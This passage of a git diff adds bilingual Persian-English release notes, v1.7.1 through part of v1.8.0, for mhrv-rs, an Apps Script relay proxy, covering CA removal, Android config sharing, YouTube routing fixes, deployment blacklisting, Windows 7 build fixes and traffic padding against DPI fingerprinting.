+• Release-drafter + prepare-release tooling ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter incrementally accumulates merged-PR titles into a draft release that's ready when it's tag time. The `prepare-release.yml` workflow (manual dispatch) auto-bumps `Cargo.toml` and `build.gradle.kts` and writes a `docs/changelog/v<ver>.md` stub the maintainer only has to translate to Persian and fix verb tenses on. Existing release flow (matrix build → GH release → Telegram) untouched. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.1.md b/docs/changelog/v1.7.1.md
new file mode 100644
index 00000000..79582d63
--- /dev/null
+++ b/docs/changelog/v1.7.1.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• امکان حذف CA به‌صورت verified ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): فلگ جدید `mhrv-rs --remove-cert` (CLI) و دکمهٔ **Remove CA** در UI دسکتاپ. CA رو از trust store سیستم‌عامل (Keychain مک، anchor dirs لینوکس، Trusted Root ویندوز)، NSS مرورگرها (Firefox/Chrome در لینوکس)، و فولدر `ca/` روی دیسک پاک می‌کنه. **`config.json` و deployment Apps Script شما دست نمی‌خوره — نیاز به redeploy نیست.** قبل از هر کاری با store، یه trust verification by-name انجام می‌شه؛ اگه remove از سیستم‌عامل fail بشه، browser state دست نمی‌خوره و حالت `RemovalIncomplete` گزارش می‌شه (retry idempotent). در Unix، اگه با sudo اجرا بشه، HOME رو به user واقعی re-root می‌کنه تا path‌های user-scoped (NSS profile، login keychain) به /root نرن. ۲۹ unit test جدید پوشش‌دهی pure logic. تست شده end-to-end در ویندوز، و **در v1.7.1 من مسیر macOS رو هم با hardware واقعی verify کردم** (login keychain delete کار می‌کنه، NSS certutil-missing graceful fallback می‌ده). مسیر Linux منتظر تست از کاربرها. ممنون از @dazzling-no-more
+---
+• Verified CA removal ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): new `mhrv-rs --remove-cert` flag (CLI) and a **Remove CA** button in the desktop UI. Clears the CA from the OS trust store (macOS Keychain, Linux anchor dirs, Windows Trusted Root), NSS browser stores (Firefox/Chrome on Linux), and the on-disk `ca/` directory. **`config.json` and your Apps Script deployment are never touched — no redeploy needed.** A by-name trust verification runs *before* any browser-state mutation; if the OS removal fails, browser state is left alone and the call returns `RemovalIncomplete` (idempotent retries). On Unix, if invoked under sudo, `HOME` is re-rooted to the real user so user-scoped paths (NSS profile, login keychain) target the user, not root. 29 new unit tests covering the pure logic. Tested end-to-end on Windows by the contributor, and **the macOS path was verified on real hardware** during merge (login-keychain delete works; NSS-certutil-missing path falls back cleanly). Linux paths await user testing. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.10.md b/docs/changelog/v1.7.10.md
new file mode 100644
index 00000000..6af68b83
--- /dev/null
+++ b/docs/changelog/v1.7.10.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "GET کامل غیرضروری وقتی Apps Script body gzip رو decode می‌کنه" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): وقتی Apps Script یه gzip body رو decode می‌کرد ولی Content-Range origin رو unchanged نگه می‌داشت، validation strict ما اون response رو reject می‌کرد + یک GET کامل دوباره می‌فرستادیم — quota Apps Script هدر می‌رفت. fix carve-out اضافه می‌کنه: اگر Content-Range proves entity کامل در probe اول گنجیده، 206 رو به 200 rewrite کنیم بدون refetch. validation strict برای real Range request‌های client + chunkهای بعدی حفظ شده. همچنین تشخیص quota error برای string‌های آلمانی (`bandbreitenkontingent`، `datenübertragungsrate`) و generic (`bandwidth`، `transfer rate`، `limit exceeded`) اضافه شد، تا deployment‌هایی که رو quota account‌های Google غیرانگلیسی هستند به‌درستی blacklist بشن. ممنون از @freeinternet865
+• رفع UI Android "Config detected in clipboard" که روی Android 13+ پس از resume کار نمی‌کرد ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ دسترسی clipboard background-to-foreground رو محدود می‌کنه — auto-detect ساکت empty می‌گرفت + banner ظاهر نمی‌شد. fix: یک دکمهٔ permanent **Paste** که روی tap clipboard رو می‌خونه (user interaction permission می‌ده در همه versionها). دکمهٔ Export به‌صورت icon-only تا row بهینه باقی بمونه. ممنون از @yyoyoian-pixel
+• رفع ناسازگاری workflow CI برای build Win7 i686 ([#318 follow-up](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)): job pinned-Rust-1.77.2 برای target Win7 i686 fail می‌کرد چون `Cargo.lock` (تولید شده توسط Rust ≥1.78) از lockfile version 4 استفاده می‌کرد + Rust 1.77 فقط version 3 رو می‌فهمه. regenerate Cargo.lock فقط روی job pinned اضافه شد — مهم: artifact `mhrv-rs-windows-i686.zip` که در v1.7.9 missing بود، در v1.7.10 reappear می‌کنه (Win7 SP1-loadable).
+---
+• Fix "unnecessary fallback full GET when Apps Script decodes a gzip body" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): when Apps Script decoded a gzip body but echoed the origin's compressed `Content-Range` unchanged, our strict validator rejected the response and we'd retry with a full GET — wasting Apps Script quota. The fix adds a carve-out: if `Content-Range` proves the entity already fits in the synthetic first probe, rewrite the 206 to a 200 and skip the refetch. Strict validation is still applied to real client `Range` requests and to later chunks. Also adds quota-error string matching for German (`bandbreitenkontingent`, `datenübertragungsrate`) and generic (`bandwidth`, `transfer rate`, `limit exceeded`) phrasings, so deployments hitting quota under non-English Google account locales now blacklist correctly. Thanks @freeinternet865.
+• Fix Android "Config detected in clipboard" banner that silently broke on Android 13+ after resume ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ restricts background-to-foreground clipboard access, so `getPrimaryClip()` during recomposition silently returned empty — the banner never showed. Fix: replace the auto-detect banner with a permanent **Paste** button that reads on tap (user interaction grants clipboard access on every Android version). Export button becomes icon-only to keep the row compact. Thanks @yyoyoian-pixel.
+• Fix the CI Win7 i686 build that silently regressed in v1.7.9 ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318) follow-up): the pinned-Rust-1.77.2 job for the i686 target failed because `Cargo.lock` (generated by stable Rust ≥1.78) uses lockfile version 4, which Rust 1.77 doesn't understand. The job now regenerates the lockfile with the pinned toolchain before building. The `mhrv-rs-windows-i686.zip` artifact that disappeared from the v1.7.9 release page reappears in v1.7.10 (and now actually loads on Win7 SP1).
diff --git a/docs/changelog/v1.7.11.md b/docs/changelog/v1.7.11.md
new file mode 100644
index 00000000..4de1518d
--- /dev/null
+++ b/docs/changelog/v1.7.11.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• v1.7.10 release page assets منتشر نشد (CI failures): دو bug همزمان بودن — (۱) target `i686-pc-windows-msvc` که در v1.7.7 برای Win7 32-bit اضافه شده بود، در v1.7.10 fail کرد چون Rust 1.77.2 (آخرین stable Win7-compat) نمی‌تونه manifest crate‌های مدرن مثل `time` 0.3.47 رو parse کنه؛ pin کردن transitive crate‌ها در هر release که یه dep MSRV رو bump می‌کنه شکننده و غیرقابل نگهداری است. (۲) job `release` با `actions/download-artifact@v4` با ۵-retry-exhausted error fail شد. **Fix:** target i686 از matrix حذف شد (کاربران Win7 ۳۲ بیتی باید self-build کنن — instructions در [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318))؛ release و telegram jobs به `gh run download` با retry loop ۳-attempt تبدیل شدن. v1.7.11 release اولین کاملی هست که از v1.7.9 منتشر می‌شه با همه fixهای v1.7.10 (Apps Script range probe + Android Paste button) plus این workflow fix.
+---
+• v1.7.10 release page assets failed to publish (CI failures): two concurrent bugs — (1) the `i686-pc-windows-msvc` target added in v1.7.7 for Win7 32-bit support broke in v1.7.10 because Rust 1.77.2 (the last stable that produces Win7-compatible binaries) can't parse the manifest of modern transitive crates like `time` 0.3.47; pinning transitives at every release where a dep bumps MSRV is brittle and unsustainable. (2) The `release` job's `actions/download-artifact@v4` step hit a 5-retries-exhausted error. **Fix:** dropped the i686 target from the matrix entirely (Win7 32-bit users must self-build now — instructions in [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)); the `release` and `telegram` jobs now use `gh run download` with a 3-attempt retry loop. v1.7.11 is the first complete release published since v1.7.9 and ships all the v1.7.10 fixes (Apps Script range probe handling per #337, Android Paste button per #344) along with this workflow repair.
diff --git a/docs/changelog/v1.7.2.md b/docs/changelog/v1.7.2.md
new file mode 100644
index 00000000..22be861d
--- /dev/null
+++ b/docs/changelog/v1.7.2.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• import/export کانفیگ در نسخهٔ اندروید با QR code، کلیپ‌بورد، deep link، و share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): انتقال کانفیگ بین دستگاه‌ها با یک تپ. **Export**: یک دیالوگ یکپارچه با QR code + رشتهٔ فشرده + دکمهٔ کپی، یا Share از طریق هر اپ (تلگرام، WhatsApp، ایمیل). فیلدهای device-specific (پورت‌ها، حالت VPN/proxy، splitMode) export نمی‌شن، فقط فیلدهای منطقی (mode، script_ids، auth_key، sni_hosts، passthrough_hosts، upstream_socks5). encoding با DEFLATE compression + base64 — کانفیگ معمولی ~۲۰۰ کاراکتر می‌شه به‌جای ~۸۰۰. **Import**: clipboard banner خودکار وقتی مهرو متن `mhrv-rs://` یا JSON خام در clipboard می‌بینه، scanner QR، یا deep link `mhrv-rs://...` (تپ روی لینک در هر اپ). **هر import نیاز به تأیید صریح کاربر داره** — قبل از overwrite شدن کانفیگ فعلی، یه دیالوگ deployment IDهای جدید رو نشون می‌ده و هشدار میده که "این لینک ترافیک شما رو از طریق این deployment IDها مسیریابی می‌کنه — فقط از منابع قابل اعتماد import کنید." این مهمه چون کانفیگ شامل auth_key هست. ممنون از @yyoyoian-pixel
+---
+• Config import/export on Android via QR code, clipboard, deep link, and share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): one-tap config sharing between devices. **Export**: a unified dialog with QR code + compressed text string + copy button, or Share via any app (Telegram, WhatsApp, email). Device-specific fields (ports, VPN/proxy mode, splitMode) are not exported — only logical config (mode, script_ids, auth_key, sni_hosts, passthrough_hosts, upstream_socks5). DEFLATE compression + base64 encoding shrinks a typical config from ~800 to ~200 chars. **Import**: clipboard banner auto-appears when mhrv-rs detects `mhrv-rs://...` or raw JSON in clipboard, QR scanner, or deep link `mhrv-rs://...` (tap from any app). **Every import path requires explicit user confirmation** — before the current config is overwritten, a dialog displays the new deployment IDs and warns "this link routes your traffic through these deployment IDs — only import from sources you trust." Important because the config contains `auth_key`. Thanks @yyoyoian-pixel
diff --git a/docs/changelog/v1.7.3.md b/docs/changelog/v1.7.3.md
new file mode 100644
index 00000000..d7ae76cf
--- /dev/null
+++ b/docs/changelog/v1.7.3.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• حذف نیاز به فورک tun2proxy ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 از یه فورک شخصی tun2proxy (با پارامتر `udpgw_server` در JNI) استفاده می‌کرد چون upstream هنوز feature flag `udpgw` رو منتشر نکرده بود. حالا که tun2proxy 0.7.21 رسماً روی crates.io با feature flag `udpgw` در دسترسه + maintainer toolchain CLI API رو به‌عنوان مسیر صحیح برای کاربران Android معرفی کرد، فورک رو حذف می‌کنیم. روش جدید: mhrv-rs از طریق `dlsym` در زمان اجرا تابع `tun2proxy_run_with_cli_args` رو از `libtun2proxy.so` resolve می‌کنه و CLI args ساده می‌فرسته (`--proxy socks5://127.0.0.1:1081 --tun-fd <fd> --udpgw-server 198.18.0.1:7300 ...`). نه فورک، نه `[patch.crates-io]`، نه commit SHA. وقتی tun2proxy update می‌شه، فقط نسخهٔ crates.io رو bump می‌کنیم. ممنون از @yyoyoian-pixel
+---
+• Drop the tun2proxy fork dependency ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 used a personal fork of tun2proxy (with a `udpgw_server` parameter added to the JNI signature) because upstream hadn't published the `udpgw` feature flag yet. With tun2proxy 0.7.21 now on crates.io with `udpgw` feature flag, and the upstream maintainer pointing callers at the C-style CLI API as the recommended path for Android, we drop the fork. New approach: mhrv-rs resolves `tun2proxy_run_with_cli_args` from `libtun2proxy.so` at runtime via `dlsym` and passes a simple CLI string (`--proxy socks5://127.0.0.1:1081 --tun-fd <fd> --udpgw-server 198.18.0.1:7300 ...`). No fork, no `[patch.crates-io]`, no pinned SHA. Future tun2proxy upgrades are a single Cargo version bump. Thanks @yyoyoian-pixel
diff --git a/docs/changelog/v1.7.4.md b/docs/changelog/v1.7.4.md
new file mode 100644
index 00000000..869109b1
--- /dev/null
+++ b/docs/changelog/v1.7.4.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "video timeout با send YouTube through relay" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): قبلاً وقتی `youtube_via_relay = true` بود، تمام دامنه‌های مرتبط با YouTube از طریق Apps Script رد می‌شدن، شامل `googlevideo.com` (chunkهای video) و `ytimg.com` (thumbnails). نتیجه: یک chunk timeout کل پخش video رو در Firefox abort می‌کرد، و video طولانی به ۶ دقیقه cap اجرای Apps Script می‌خورد. **Fix:** حالا `youtube_via_relay` فقط API/HTML رو از relay رد می‌کنه (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — جایی که Restricted Mode enforce می‌شه)، در حالی که CDNهای video/image مستقیماً از Google edge می‌گذرن (`googlevideo.com` که در نسخه‌های قبل اصلاً در لیست SNI rewrite نبود اضافه شد، `ytimg.com`، `ggpht.com`). نتیجه: Restricted Mode بدون قطع شدن video. ممنون از @amirabbas117 برای تحلیل دقیق
+• Negative-cache برای destinationهای unreachable + pre-warm بزرگ‌تر در startup ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): گوشی‌های بدون IPv6 وقتی پروب IPv6-only host (مثلاً `ds6.probe.whatismyipaddress.com`) می‌فرستن، 5+ batch Apps Script در ثانیه روی destination تضمین‌fail هدر می‌رفت. حالا cache 30s × 256-entry در `TunnelMux` نگه می‌داره برای destinationهایی که tunnel-node با `Network is unreachable` یا `No route to host` پاسخ داده — short-circuit به `502 Bad Gateway` (HTTP CONNECT) یا `0x04 Host unreachable` (SOCKS5) برای هر retry بعدی. Pre-warm pool startup هم بزرگتر شد (۱۲ تا ۲۴ connection به‌جای ۸) برای کمتر شدن first-use latency. ممنون از @dazzling-no-more
+---
+• Fix "video timeout when 'Send YouTube through relay' is on" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): previously, `youtube_via_relay = true` routed every YouTube-related domain through Apps Script — including `googlevideo.com` (video chunks) and `ytimg.com` (thumbnails). Result: a single chunk timeout aborted entire Firefox playbacks, and long videos hit Apps Script's 6-min execution cap mid-playback. **Fix:** `youtube_via_relay` now only relays the API/HTML hosts (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — where Restricted Mode is enforced), while video/image CDNs go direct via Google edge (`googlevideo.com` was missing from the SNI rewrite list entirely; now added; `ytimg.com`, `ggpht.com` stay on SNI rewrite always). Restricted Mode bypass without breaking playback. Thanks @amirabbas117 for the detailed analysis
+• Negative-cache for unreachable destinations + larger startup pre-warm pool ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): on devices without IPv6, OS/app probes to IPv6-only hostnames (e.g. `ds6.probe.whatismyipaddress.com`) were burning 5+ Apps Script batches per second on a guaranteed-fail destination. `TunnelMux` now keeps a 30s × 256-entry cache of destinations the tunnel-node returned `Network is unreachable` / `No route to host` for, and short-circuits subsequent CONNECTs with `502 Bad Gateway` (HTTP CONNECT) or `0x04 Host unreachable` (SOCKS5). Startup pre-warm pool also grew (12 → 24 connections) to reduce first-use latency. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.5.md b/docs/changelog/v1.7.5.md
new file mode 100644
index 00000000..5696630f
--- /dev/null
+++ b/docs/changelog/v1.7.5.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• گزینهٔ جدید `block_quic` در config برای رد کردن client-side QUIC ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): با `"block_quic": true` در `config.json`، listener SOCKS5 UDP هر datagramی به مقصد port 443 (یعنی HTTP/3-over-UDP) رو silent drop می‌کنه. browser به TCP/HTTPS fallback می‌کنه (که از مسیر CONNECT معمولی رد می‌شه و از relay می‌گذره). برای کاربرهایی که QUIC TCP-meltdown رو در Full mode تجربه می‌کنن (پهنای باند < 1 Mbps در عوض > 50 Mbps با TCP/HTTPS) خوبه. به‌صورت opt-in (پیش‌فرض false). ممنون از @w0l4i
+• release artifacts دوباره به پوشهٔ `releases/` در مخزن commit می‌شن (به درخواست کاربر تلگرام): پس از v1.1.0 این عادت متوقف شده بود — حالا بعد از هر release tag، workflow خودکار فایل‌های pre-built رو در پوشه `releases/` به‌روزرسانی می‌کنه. کاربرانی که به صفحه GitHub Releases دسترسی ندارن (به‌خاطر فیلتر در ایران) می‌تونن از طریق `Code → Download ZIP` به فایل‌های آخرین نسخه برسن. صفحه release رسمی همچنان artifact‌های versioned رو داره — این پوشه fallback هست
+---
+• New `block_quic` config option for client-side QUIC drop ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): set `"block_quic": true` in `config.json` and the SOCKS5 UDP relay silently drops any datagram destined for port 443 (HTTP/3-over-UDP). The client's QUIC stack retries a couple of times and then falls back to TCP/HTTPS, which goes through the regular CONNECT path and through the relay. Useful for users seeing QUIC TCP-meltdown in Full mode (sub-1 Mbps where TCP/HTTPS does 50+). Opt-in (default false). Thanks @w0l4i
+• Release artifacts now committed back to the in-repo `releases/` folder (per Telegram channel request): the practice was stopped after v1.1.0 — now after every release tag, the workflow auto-refreshes `releases/` with the pre-built binaries. Users behind GitHub-Releases-page filtering can grab the latest version via `Code → Download ZIP`. The official release page still has versioned artifacts; the in-repo folder is the fallback path
diff --git a/docs/changelog/v1.7.6.md b/docs/changelog/v1.7.6.md
new file mode 100644
index 00000000..58d20ef0
--- /dev/null
+++ b/docs/changelog/v1.7.6.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Revert غلط v1.7.4 برای `googlevideo.com` ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)، [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 تلاش کرد `googlevideo.com` رو به لیست SNI rewrite اضافه کنه به این تئوری که chunk‌های ویدیو باید از Apps Script relay دور بزنن. **چندین کاربر گزارش دادن که v1.7.4 YouTube رو کاملاً شکست داد** — علت: `googlevideo.com` توسط edge IP‌های جدا "EVA" گوگل serve می‌شه، نه GFE IP عادی که `google_ip` کاربر معمولاً به اون اشاره می‌کنه. SNI-rewrite کردن `googlevideo.com:443` به یه GFE IP باعث TLS handshake failure یا wrong-cert error برای اون کاربرها شد. **رفتار قبل از v1.7.4 برگشته** (chunk‌های ویدیو از مسیر Apps Script relay می‌رن — کندتر ولی روی هر GFE IP قابل اعتماد). تغییرات `youtube_via_relay` carve-out از v1.7.4 (که `ytimg.com` رو از relay پاک کرد) دست نخورده — اون regression جدا بود و درست شده باقی مونده. اگه کاربری در آینده EVA edge IP خودش رو پیکربندی بکنه، یه knob مجزا اضافه می‌کنیم.
+---
+• Revert v1.7.4 `googlevideo.com` SNI rewrite ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275), [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 added `googlevideo.com` to the SNI rewrite list on the theory that video chunks should bypass the Apps Script relay. **Multiple users reported v1.7.4 broke YouTube entirely** — root cause: `googlevideo.com` is served by Google's separate "EVA" edge IPs, not the regular GFE IPs that `google_ip` typically points at. SNI-rewriting `googlevideo.com:443` to a GFE IP got TLS handshake failures or wrong-cert errors for those users. **Pre-v1.7.4 behaviour is restored** (video chunks go via the Apps Script relay path — slower but reliable on every GFE IP). The other v1.7.4 `youtube_via_relay` carve-out changes (which removed `ytimg.com` from the carve-out) are intact — those were a separate fix that's still correct. If a user ever wants direct googlevideo.com routing, that needs a separate config knob letting them specify their EVA edge IP independently.
diff --git a/docs/changelog/v1.7.7.md b/docs/changelog/v1.7.7.md
new file mode 100644
index 00000000..13f3cf54
--- /dev/null
+++ b/docs/changelog/v1.7.7.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• اضافه شدن build برای ویندوز ۳۲ بیتی (i686-pc-windows-msvc) به matrix release ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): کاربری که سیستم قدیمی ویندوز ۳۲ بیتی داشت درخواست build اختصاصی کرد. حالا artifact ‫`mhrv-rs-windows-i686.zip`‬ هم در release page موجوده. ممنون از @amiralishoja برای PR
+• رفع باگ "یک deployment معیوب همه ‍session‌ها رو روی cadence legacy گیر می‌اندازه" ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): قبلاً وقتی یکی از deployment‌ها fast-empty (long-poll نمی‌شناخت) برمی‌گردوند، flag global `server_no_longpoll` فعال می‌شد و کل session‌ها رو روی cadence ۳۰ ثانیه‌ای legacy گیر می‌انداخت — حتی اگه deployment‌های دیگه راحت long-poll می‌کردن. اون flag همچنین هیچ‌وقت reset نمی‌شد، پس tunnel-node بازنشانده تا restart process به مسیر سریع برنمی‌گشت. **Fix:** state per-deployment با TTL ۶۰ ثانیه. flag aggregate فقط وقتی فعال می‌شه که **همه** deployment‌های یکتا mark شده باشن، و خودش رو از روی expiry self-correct می‌کنه. tunnel-node ارتقا داده شده خودش به مسیر long-poll fast بدون restart برمی‌گرده. ۴ تست جدید با `tokio::test(start_paused = true)` پوشش‌دهی timing logic. ممنون از @dazzling-no-more
+---
+• Add 32-bit Windows (i686-pc-windows-msvc) to the release matrix ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): a user with a legacy 32-bit Windows machine asked for a dedicated build. `mhrv-rs-windows-i686.zip` now appears alongside the other artifacts on every release page. Thanks @amiralishoja for the PR
+• Fix "one degraded deployment drags all sessions onto the legacy cadence" bug ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): previously, a single fast-empty observation from any one deployment flipped the global `server_no_longpoll` flag, dragging every session onto the 30-second legacy cadence even when the other deployments were happily long-polling. The flag also never reset, so a redeployed/recovered tunnel-node didn't return to the fast path until the mhrv-rs process was restarted. **Fix:** state is now per-deployment with a 60-second TTL. The aggregate flag flips only when **every** unique configured deployment is marked, and self-corrects on read when entries expire. An upgraded tunnel-node rejoins the long-poll fast path on its own. 4 new tests using `tokio::test(start_paused = true)` to cover the timing logic without burning real wall-clock seconds. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.8.md b/docs/changelog/v1.7.8.md
new file mode 100644
index 00000000..6f7d9030
--- /dev/null
+++ b/docs/changelog/v1.7.8.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Blacklist خودکار deployment با timeout مکرر در batch ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): قبلاً وقتی یک deployment hang می‌کرد (معمولاً به دلیل `TUNNEL_SERVER_URL` قدیمی که به host از کار افتاده اشاره می‌کرد، یا Apps Script که UrlFetchApp داخلش hang کرده بود)، round-robin مدام traffic رو به همون deployment می‌فرستاد و sessionها timeout می‌خوردند بدون recovery تا restart process. **Fix:** state per-deployment با window ۳۰ ثانیه‌ای — ۳ timeout در پنجره ۳۰ ثانیه‌ای منجر به blacklist با cooldown ۱۲۰ ثانیه می‌شه. هر batch موفق strikeها رو پاک می‌کنه. cooldown کوتاه (۲ دقیقه به‌جای ۱۰ دقیقه برای quota) تا deploymentای که سریع recover می‌شه به‌سرعت برگرده. مستقل از blacklist موجود برای quota-error (که هنوز ۱۰ دقیقه cooldown داره). برای scenario `5 از 8 deployment کهنه`: بعد از یک batch، ۳ deployment dropped می‌شن و session جدید با احتمال خیلی بیشتر روی deployment سالم می‌افته. ممنون از @dazzling-no-more
+---
+• Auto-blacklist deployments after sustained batch timeouts ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): previously, when a single deployment hung (most commonly due to a stale `TUNNEL_SERVER_URL` pointing at a dead host, or Apps Script's internal `UrlFetchApp` stalling), round-robin kept dispatching real traffic to it. Sessions piled into the bad deployment and timed out without recovery until the user restarted mhrv-rs. **Fix:** per-deployment strike counter with a 30-second sliding window — 3 timeouts in 30 s triggers a 120-second cooldown blacklist. Any successful batch clears the strike counter, so unrelated transient blips can't accumulate across hours. Short cooldown (2 min vs. the 10 min permanent-blacklist for quota errors) so a deployment that recovers rejoins the round-robin quickly. For the "5 of 8 deployments stale" scenario: after one batch each, the 3 dead deployments drop out and new sessions land on healthy deployments with much higher probability. Distinct from the quota blacklist (still 600s cooldown). Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.9.md b/docs/changelog/v1.7.9.md
new file mode 100644
index 00000000..15a7c657
--- /dev/null
+++ b/docs/changelog/v1.7.9.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "binary i686 ویندوز روی Windows 7 ۳۲ بیتی load نمی‌شه" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)، [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): از Rust 1.78 (می ۲۰۲۴) std به‌جای `GetSystemTimeAsFileTime` (Win2k+) از `GetSystemTimePreciseAsFileTime` (Win8+) استفاده می‌کنه، و این باعث شد binary ویندوز ۳۲ بیتی از kernel32 یه export بخواد که تو Win7 وجود نداره. binary v1.7.7/v1.7.8 با خطای `the procedure entry point GetSystemTimePreciseAsFileTime could not be located in the dynamic link library kernel32.dll` روی Win7 SP1 بسته می‌شد. **Fix:** فقط target `i686-pc-windows-msvc` رو در workflow CI به Rust 1.77.2 (آخرین stable Win7-compatible) pin کردیم. سایر targets روی stable می‌مونن. این یعنی artifact `mhrv-rs-windows-i686.zip` در v1.7.9 روی Win7 SP1 ۳۲ بیتی load می‌شه. ممنون از @Im-P3dro برای گزارش
+---
+• Fix "i686 Windows binary fails to load on Windows 7 32-bit" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318), [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): Rust 1.78 (May 2024) raised std's Windows MSRV from Win7 to Win10 by switching `std::time` to `GetSystemTimePreciseAsFileTime` (Win8+ in kernel32) instead of the older `GetSystemTimeAsFileTime`. The v1.7.7 and v1.7.8 i686 Windows binaries failed to load on Win7 SP1 with `the procedure entry point GetSystemTimePreciseAsFileTime could not be located in the dynamic link library kernel32.dll`, defeating the entire reason that target ships (legacy Win7 32-bit boxes per #272). **Fix:** pin only the `i686-pc-windows-msvc` CI matrix entry to Rust 1.77.2 (the last stable that targets Win7); every other target stays on `@stable`. The `mhrv-rs-windows-i686.zip` artifact in v1.7.9 once again loads on Win7 SP1. Thanks @Im-P3dro for the report.
diff --git a/docs/changelog/v1.8.0.md b/docs/changelog/v1.8.0.md
new file mode 100644
index 00000000..77a79bd7
--- /dev/null
+++ b/docs/changelog/v1.8.0.md
@@ -0,0 +1,12 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Padding random برای پایلود Apps Script ([#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)، [#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 1): هر request به Apps Script حالا یک فیلد `_pad` با طول uniform-random بین ۰-۱۰۲۴ بایت اضافه می‌کنه — به‌صورت base64 encoded. بدون این، طول request body در هر mode تقریباً ثابت می‌مونه + DPI ایران می‌تونه بر اساس distribution طول fingerprint بزنه. حالا packet sizes uniformly distributed هستن + length-clustering match نمی‌کنه. تأثیر bandwidth: متوسط ۵۱۲ بایت اضافه به batch ~۲KB = +۲۵٪، negligible در برابر floor latency Apps Script. backward-compatible: Code.gs قدیم هم کار می‌کنه (unknown JSON fields ignore می‌شن).
+• Defense active probing: decoy 200 HTML در Code.gs / CodeFull.gs روی AUTH_KEY بد ([#365](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/365) Section 3): قبلاً request بدون auth `{"e":"unauthorized"}` JSON برمی‌گردوند — fingerprint مشخص "این یه API endpoint هست". حالا یه HTML benign placeholder برمی‌گردونه که شبیه یه Apps Script web app forgotten-but-public هست. scanner active که با AUTH_KEY ساختگی POST می‌کنه categorize می‌کنه به‌عنوان "non-tunnel، nothing interesting". flag `DIAGNOSTIC_MODE` برای setup که response قدیمی JSON رو برمی‌گردونه — default `false` (production-strong)
